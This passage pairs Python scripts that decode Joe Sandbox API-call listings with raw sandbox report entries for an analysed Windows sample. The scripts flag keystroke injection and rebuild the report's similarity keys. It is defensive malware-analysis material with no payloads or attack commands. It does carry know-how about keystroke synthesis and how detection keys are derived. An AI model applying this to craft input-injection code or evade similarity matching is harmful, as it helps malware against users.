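from dataclasses import dataclass, field
from typing import List, Optional

# Message constants from the Win32 SDK headers. Unknown values fall through as raw hex.
MSG_NAMES = {
    0x0100: "WM_KEYDOWN",
    0x0101: "WM_KEYUP",
    0x0102: "WM_CHAR",
    0x0104: "WM_SYSKEYDOWN",
    0x0105: "WM_SYSKEYUP",
    0x1024: "LVM_SETTEXTCOLOR",   # LVM_FIRST (0x1000) + 36
    0x111E: "TVM_SETTEXTCOLOR",   # TV_FIRST  (0x1100) + 30
    0x130C: "TCM_SETCURSEL",      # TCM_FIRST (0x1300) + 12
}
# SendInput(cInputs, pInputs, cbSize): sizeof(INPUT) is 28 bytes on x86 and 40 on x64.
INPUT_SIZES = {0x1C: "cbSize=28 (32-bit INPUT)", 0x28: "cbSize=40 (64-bit INPUT)"}
SW_NAMES = {0: "SW_HIDE", 1: "SW_SHOWNORMAL", 4: "SW_SHOWNOACTIVATE", 5: "SW_SHOW"}

# Leading bullet/whitespace, Api.MODULE(args), ref: 8-digit hex address.
LINE_RE = re.compile(r"^\W*(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]{8})\s*$")


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Optional[int]]          # None where the report prints '?'
    ref: int
    notes: List[str] = field(default_factory=list)


def _annotate(c: ApiCall) -> None:
    """Attach human-readable names for the constants this call receives."""
    a = c.args
    if c.api in ("PostMessageW", "PostMessageA", "SendMessageW", "SendMessageA") \
            and len(a) > 1 and a[1] is not None:
        c.notes.append(MSG_NAMES.get(a[1], f"msg 0x{a[1]:04X}"))
    elif c.api == "SendInput" and len(a) == 3 and a[2] is not None:
        c.notes.append(INPUT_SIZES.get(a[2], f"cbSize 0x{a[2]:X} (unexpected)"))
    elif c.api == "ShowWindow" and len(a) == 2 and a[1] is not None:
        c.notes.append(SW_NAMES.get(a[1], f"nCmdShow {a[1]}"))
    elif c.api == "EnableWindow" and len(a) == 2 and a[1] is not None:
        c.notes.append("enable" if a[1] else "disable")


def parse_line(line: str) -> Optional[ApiCall]:
    """Parse one report line; returns None for headers such as 'APIs' or 'Strings'."""
    m = LINE_RE.match(line)
    if not m:
        return None
    api, module, raw_args, ref = m.groups()
    args = [None if a.strip() in ("", "?") else int(a, 16) for a in raw_args.split(",")]
    call = ApiCall(api, module, args, int(ref, 16))
    _annotate(call)
    return call


def parse_listing(text: str) -> List[ApiCall]:
    return [c for c in (parse_line(l) for l in text.splitlines()) if c]


def summarize(calls: List[ApiCall]) -> List[str]:
    return [f"{c.ref:08X} {c.api}.{c.module} {' '.join(c.notes)}".rstrip() for c in calls]


def flags_keystroke_injection(calls: List[ApiCall]) -> bool:
    """Heuristic (this example's assumption): a routine that reads and overwrites the
    keyboard state, posts key messages to a window and also calls SendInput is
    synthesising keystrokes rather than handling user input."""
    apis = {c.api for c in calls}
    posted = {c.args[1] for c in calls if c.api.startswith("PostMessage") and len(c.args) > 1}
    return ({"GetKeyboardState", "SetKeyboardState", "SendInput"} <= apis
            and bool(posted & {0x0100, 0x0102, 0x0104}))


# Sample input copied from the report's function listings (refs 0044C570.., 0044908B.., 00440A8A..).
KEYBOARD_FUNC = """\
• GetKeyboardState.USER32(?), ref: 0044C570
• SetKeyboardState.USER32(00000080), ref: 0044C594
• PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
• PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
• PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
• SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
"""
COLOR_FUNC = """\
• SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
• SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
• SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
• InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
• GetWindowLongW.USER32(?,000000F0), ref: 004490D4
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
"""
SHOW_FUNC = """\
• ShowWindow.USER32(?,00000000), ref: 00440A8A
• EnableWindow.USER32(?,00000000), ref: 00440AAF
• ShowWindow.USER32(?,00000000), ref: 00440B18
• ShowWindow.USER32(?,00000004), ref: 00440B2B
• EnableWindow.USER32(?,00000001), ref: 00440B50
• SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
"""

if __name__ == "__main__":
    for name, text in (("keyboard", KEYBOARD_FUNC), ("color", COLOR_FUNC), ("show", SHOW_FUNC)):
        calls = parse_listing(text)
        print(f"[{name}] keystroke injection: {flags_keystroke_injection(calls)}")
        for line in summarize(calls):
            print("  " + line)
```

Running it names 0x0100/0x0104/0x0102 as WM_KEYDOWN/WM_SYSKEYDOWN/WM_CHAR and reports the keyboard routine as keystroke injection, while the colour and show/hide routines decode to ordinary list-view, tree-view and tab-control messages and are not flagged. The cbSize of 0x1C passed to SendInput is consistent with the 32-bit image base and addresses in these listings; a 64-bit build would pass 0x28. The decoder deliberately leaves 0x0409 and the 0x000000F0 index to GetWindowLongW undecoded, since the report gives no further context for them.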
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                         • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$LongWindow$InvalidateRect
                                                                                                        • String ID:
                                                                                                        • API String ID: 1976402638-0
                                                                                                        • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                                                        • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                                                                                                        • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                                                        • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                                                                                                        APIs
                                                                                                        • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                                                                                        • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                                                                                        • ShowWindow.USER32(?,00000000), ref: 00440B18
                                                                                                        • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                                                                                        • EnableWindow.USER32(?,00000001), ref: 00440B50
                                                                                                        • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                         • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$Show$Enable$MessageSend
                                                                                                        • String ID:
                                                                                                        • API String ID: 642888154-0
                                                                                                        • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                                                        • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                                                                                        • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                                                        • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Variant$Copy$ClearErrorLast
                                                                                                        • String ID: NULL Pointer assignment$Not an Object type
                                                                                                        • API String ID: 2487901850-572801152
                                                                                                        • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                                                        • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                                                                                                        • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                                                        • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                                                                                        APIs
                                                                                                        • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                                                                                                        • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                        • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                        • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                        • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                        • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$Enable$Show$MessageSend
                                                                                                        • String ID:
                                                                                                        • API String ID: 1871949834-0
                                                                                                        • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                                                        • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                                                                                                        • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                                                        • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                                                        • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                                                                                        • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                                                        • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                                                                                        APIs
                                                                                                        • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                                                                                        • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                                                                                        • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                                                                                        • SendMessageW.USER32 ref: 00471AE3
                                                                                                        • DestroyIcon.USER32(?), ref: 00471AF4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                                                                                                        • String ID:
                                                                                                        • API String ID: 3611059338-0
                                                                                                        • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                                                        • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                                                                                                        • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                                                        • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
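The "API ID" in each Similarity block is a key derived from the function's API list, not from its bytes. The following is an added example, not Joe Sandbox code: it parses API lines exactly as they are printed in this report and rebuilds that key for three entries on this page (the ExtractIconExW function at 00471A45, the EnableWindow/ShowWindow function at 0044881F, and the _wcslen/_wcstok function at 004438CD). The tokenisation rules (CamelCase split, dropped "Get" verb and A/W/Ex suffixes, "ImageList_" kept as one token, CRT names kept whole, ties concatenated in ASCII order, count groups joined by "$") are inferred from the keys shown on this page and are an assumption about the real algorithm.

```python
"""Rebuild the 'API ID' similarity key shown in this report's Similarity blocks.

Added example, not Joe Sandbox code.  The rules are inferred from the entries
on this page and are an assumption about the real algorithm: every API name in
a function's list (including 'Part of subcall function' lines) is split into
CamelCase words, the generic 'Get' verb and the Win32 A/W/Ex suffixes are
dropped, an underscore prefix such as 'ImageList_' is kept as one token, CRT
names such as '_wcslen' are kept whole, tokens are counted, and tokens with the
same count are concatenated in ASCII order, with '$' between count groups in
descending order of count.
"""
import re
from collections import Counter

# Three API lists copied verbatim from the function entries in this report.
ICON_ENTRY = """\
• ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
• SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
• ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
• SendMessageW.USER32 ref: 00471AE3
• DestroyIcon.USER32(?), ref: 00471AF4
"""
WINDOW_ENTRY = """\
• SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
• EnableWindow.USER32(?,00000000), ref: 00448B5C
• EnableWindow.USER32(?,00000001), ref: 00448B72
• ShowWindow.USER32(?,00000000), ref: 00448BE8
• ShowWindow.USER32(?,00000004), ref: 00448BF4
• EnableWindow.USER32(?,00000001), ref: 00448C09
"""
WCS_ENTRY = """\
  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
• _wcslen.LIBCMT ref: 004438CD
• _wcslen.LIBCMT ref: 004438E6
• _wcstok.LIBCMT ref: 004438F8
• _wcslen.LIBCMT ref: 0044390C
• GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
• _wcstok.LIBCMT ref: 00443931
"""

# One API line of the report: optional subcall note, Name.MODULE, optional
# argument list, and the address of the call site after 'ref:'.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Assumed stop tokens: the 'Get' verb and the ANSI/Unicode/extended suffixes.
DROPPED = {"Get", "A", "W", "Ex"}


def parse_api_calls(text):
    """Return one dict per API line; headers such as 'APIs' are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = m.group("args")
        calls.append({
            "name": m.group("name"),
            "module": m.group("module"),
            "args": args.split(",") if args else [],
            "ref": int(m.group("ref"), 16),
            "subcall_of": int(m.group("parent"), 16) if m.group("parent") else None,
        })
    return calls


def tokenize(name):
    """Split an API name into the words the similarity key counts."""
    if name.startswith("_"):          # CRT name such as _wcslen: one token
        return [name]
    tokens = []
    if "_" in name:                   # ImageList_Create -> 'ImageList_' + 'Create'
        prefix, _, name = name.partition("_")
        tokens.append(prefix + "_")
    words = re.findall(r"[A-Z][a-z0-9]*|[a-z0-9]+", name)
    return tokens + [w for w in words if w not in DROPPED]


def api_id(calls):
    """Bag-of-words key: '$' separates count groups, ties sort in ASCII order."""
    counts = Counter(tok for c in calls for tok in tokenize(c["name"]))
    by_count = {}
    for tok, n in counts.items():
        by_count.setdefault(n, []).append(tok)
    return "$".join("".join(sorted(by_count[n]))
                    for n in sorted(by_count, reverse=True))


def modules_used(calls):
    """Which export modules a function touches, e.g. {'USER32': 3, 'COMCTL32': 2}."""
    return dict(Counter(c["module"] for c in calls))


if __name__ == "__main__":
    for label, entry in (("icon", ICON_ENTRY), ("window", WINDOW_ENTRY), ("wcs", WCS_ENTRY)):
        calls = parse_api_calls(entry)
        print(label, api_id(calls), modules_used(calls))
```

Under these rules the key is a bag of words: it ignores call order, argument values and the exporting module, so two functions whose calls were reordered or whose constants differ still share an API ID. A match on API ID alone is therefore weak evidence of code identity; compare the Opcode and Instruction fuzzy hashes listed beside it before treating two functions as the same.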
APIs
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: DestroyWindow$DeleteObject$IconMove
• String ID:
• API String ID: 1640429340-0
• Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
• Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
• Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
• Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
APIs
  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
• _wcslen.LIBCMT ref: 004438CD
• _wcslen.LIBCMT ref: 004438E6
• _wcstok.LIBCMT ref: 004438F8
• _wcslen.LIBCMT ref: 0044390C
• GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
• _wcstok.LIBCMT ref: 00443931
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
• String ID:
• API String ID: 3632110297-0
• Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
• Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
• Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
• Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
APIs
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: Destroy$DeleteMenuObject$IconWindow
• String ID:
• API String ID: 752480666-0
• Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
• Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
• Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
• Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
APIs
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: Destroy$DeleteObjectWindow$IconImageList_
• String ID:
• API String ID: 3275902921-0
• Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
• Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
• Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
• Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
APIs
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                                        • String ID:
                                                                                                        • API String ID: 3275902921-0
                                                                                                        • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                                                        • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                                                                                                        • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                                                        • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                                                                                                        APIs
